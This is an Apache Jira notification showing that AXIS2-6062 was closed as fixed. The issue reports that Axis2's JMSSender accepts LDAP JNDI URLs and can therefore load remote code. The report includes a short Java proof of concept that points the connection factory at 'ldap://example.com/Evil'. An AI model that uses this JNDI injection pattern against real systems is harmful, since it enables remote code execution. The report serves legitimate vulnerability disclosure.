[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Robert Lazarski closed AXIS2-6062. ---------------------------------- Resolution: Fixed > Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol > in `JMSSender`? > -------------------------------------------------------------------------------------------- > > Key: AXIS2-6062 > URL: https://issues.apache.org/jira/browse/AXIS2-6062 > Project: Axis2 > Issue Type: Bug > Components: JMS transport > Affects Versions: 1.8.2 > Reporter: Letian Yuan > Assignee: Robert Lazarski > Priority: Critical > Fix For: 2.0.0 > > > In "org.apache.axis2:axis2-transport-jms", there is a method, > `{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a > JMS message. However, if we send a JMS message like this: > > {{ MessageContext context = new MessageContext();}} > {{ context.setProperty("TransportURL", > "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");}} > {{ JMSSender sender = new JMSSender();}} > {{ sender.invoke(context);}} > > Then, arbitrary commands from remote server "ldap://example.com/Evil" would > be executed. > We want to discuss with you about it. > First, excecuting arbitrary commands from remote server is quite dangerous. > Second, as far as we know, no one would use LDAP protocol to get > `{{{}ConnectionFactory{}}}`. > Third, it seem this behavior has not been documented in your “User’s Guide”, > so library users might not know this API of sending JMS messages can be used > to execute arbitrary commands. So, I think that library users are very > possible to misuse this API. For example, concatenating user input to the > parameter of `{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}` > available in a configuration file such as `{{{}foobar.properties{}}}`. We > know that such cases rarely happen and might not be your design purpose, but > it is possible anyway. As long as an attacker can control the parameter of > `{{{}invoke{}}}`, remote code injection might happen. > Therefore, we want to ask you whether it is your design purpose and whether > it is necessary for LDAP protocol (and RMI, JRMP, etc.). > This is just our opinion, and we are willing to discuss it with you. -- This message was sent by Atlassian Jira (v8.20.10#820010) --------------------------------------------------------------------- To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org For additional commands, e-mail: java-dev-h...@axis.apache.org